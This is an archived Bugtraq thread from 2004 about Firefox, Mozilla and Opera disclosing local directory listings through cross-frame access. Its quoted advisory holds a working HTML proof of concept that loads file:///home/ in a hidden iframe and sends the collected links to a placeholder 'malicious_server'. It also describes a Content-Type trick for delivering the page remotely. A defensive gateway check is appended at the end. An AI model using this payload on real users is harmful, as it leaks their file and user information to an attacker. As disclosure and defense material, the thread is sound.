Bugtraq mailing list archives
Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:


From: Liu Die Yu <liudieyu () umbrella name>
Date: Thu, 02 Dec 2004 09:49:06 +0800

Target user doesn't need to click the OPEN button:

1. Cross-site scripting vulnerabilities can get it done (on Mozilla, an internet page can't navigate to a local page directly ... but there are ways to bypass this restriction).
2. Ask target to open an HTML file in a remote SMBFS folder - expecting him to
   mount -t smbfs [...] /mnt/[...]
   and open "/mnt/[...].html" in Mozilla :-)

Attacker can *browse* target's folders and files (file content, filename, filesize, and even the date).

==========
http://editive.com/referrer

Giovanni Delvecchio wrote:
Title: Disclosure of file system information in Mozilla Firefox and Opera Browser

Note:
I don't know if it could be considered really a security problem, anyway I'll try to explain my ideas.
Sorry for my bad English.

Author: Giovanni Delvecchio
Bug: Disclosure of file system information

Applications affected:
- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)
( maybe also previous versions )

Tested versions:
- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux

Note:
The content of this advisory could be applied also to other browsers, I have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.

Bug Description:
================
A problem exists in some browsers where a frame can gain access to attributes of another frame or iframe.
An application of this bug could be the possibility to disclose local directory structure.

PoC:
===
------ begin code.htm -----
<html>
<body onLoad="
 list_files='';
 for(i=0;i<local_files.document.links.length;i++)
          {list_files+=local_files.document.links.item(i);}
 alert(list_files);
 //send list_files at malicious_server
 document.location.href='http://malicious_server/grab.php?list='+list_files;
             ">
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
------ end of code.htm -------

Impact:
======
A malicious server could obtain the content of /home/ directory ( or c:\Document and Setting\ for windows system ) and so know a set of usernames present on system target.
Moreover, it could be possible to know if a particular program is installed on target system for a successive attack.
Anyway it cannot be exploited "directly" by a remote site, but only if the page is opened from a local path ( file://localpath/code.htm), since the iframe "local_files" belongs to a local domain.
Note: with Internet Explorer code.htm doesn't work even in local.

Possible Remote Exploitation:
========================
Question:
How could a malicious remote user exploit it ?

Answer:
After that the user "victim" has required http://malicious_server/code.htm, if malicious_server responds with a page containing an unknown Content-Type field ( for example text/html., note the dot), the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened in local; javascript code will be executed in local context.
Obviously, if user chooses to save and after open it the result is equal.

(*) For Opera this method of remote exploitation requires that Opera must be set as Default Application in "handler for saved files" whether the user chooses "Open" in the dialog window.

Solution:
========
No solution at the moment

Vendor notice
==============
24th November 2004: I have contacted mozilla by security () mozilla org and Opera by its bug track page at https://bugs.opera.com/wizard/
No response from both at the moment.

Best regards,
Giovanni Delvecchio
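
An added example, not part of the original posts or of any browser's code: a gateway-side check for the remote delivery path the advisory describes, where an HTML body arrives under an unrecognized Content-Type such as text/html. and contains a frame pointing at a file: URL. The allowlist, function names and sample responses are assumptions constructed for illustration.

```javascript
// Added example: gateway-side check for the delivery path described in the advisory.
// The allowlist, function names and sample responses are constructed for illustration.
const RECOGNIZED_TYPES = new Set([
  'text/html', 'application/xhtml+xml', 'text/plain', 'text/css',
  'application/javascript', 'application/json', 'application/octet-stream',
  'image/png', 'image/jpeg', 'image/gif',
]);

// Return the lowercase "type/subtype" without parameters, or null if it is not
// a syntactically valid media type. "text/html." is valid syntax, just unknown.
function parseMediaType(header) {
  if (typeof header !== 'string') return null;
  const essence = header.split(';')[0].trim().toLowerCase();
  const token = "[!#$%&'*+.^_`|~0-9a-z-]+";
  return new RegExp(`^${token}/${token}$`).test(essence) ? essence : null;
}

// Does the body start like an HTML document, whatever the header claims?
function looksLikeHtml(body) {
  return /^\s*<(?:!doctype\s+html|html|head|body|script|iframe)\b/i.test(body.slice(0, 512));
}

// Collect frame/iframe src values that use the file: scheme.
function localFrameSources(body) {
  const re = /<i?frame\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const found = [];
  for (const m of body.matchAll(re)) {
    const src = (m[1] || m[2] || m[3] || '').trim();
    if (/^file:/i.test(src)) found.push(src);
  }
  return found;
}

// Two independent findings: both together give 'block', one gives 'review'.
function assessResponse(contentType, body) {
  const mediaType = parseMediaType(contentType);
  const unrecognized = mediaType === null || !RECOGNIZED_TYPES.has(mediaType);
  const findings = [];
  if (unrecognized && looksLikeHtml(body)) findings.push('html-under-unrecognized-type');
  const frames = localFrameSources(body);
  if (frames.length > 0) findings.push('frame-loads-file-url');
  const verdict = findings.length === 2 ? 'block' : findings.length === 1 ? 'review' : 'pass';
  return { mediaType, findings, frames, verdict };
}

// Constructed sample: the header value and frame from the advisory, without its script.
const SAMPLE_BODY = '<html><body><iframe name="local_files" src="file:///home/" height=0 width=0></iframe></body></html>';
console.log(assessResponse('text/html.', SAMPLE_BODY));
console.log(assessResponse('text/html; charset=utf-8', '<html><body>hello</body></html>'));
```

The check treats the header and the body separately because text/html. parses as a well-formed media type; only comparison against a list of recognized types, combined with sniffing the body, reveals the mismatch.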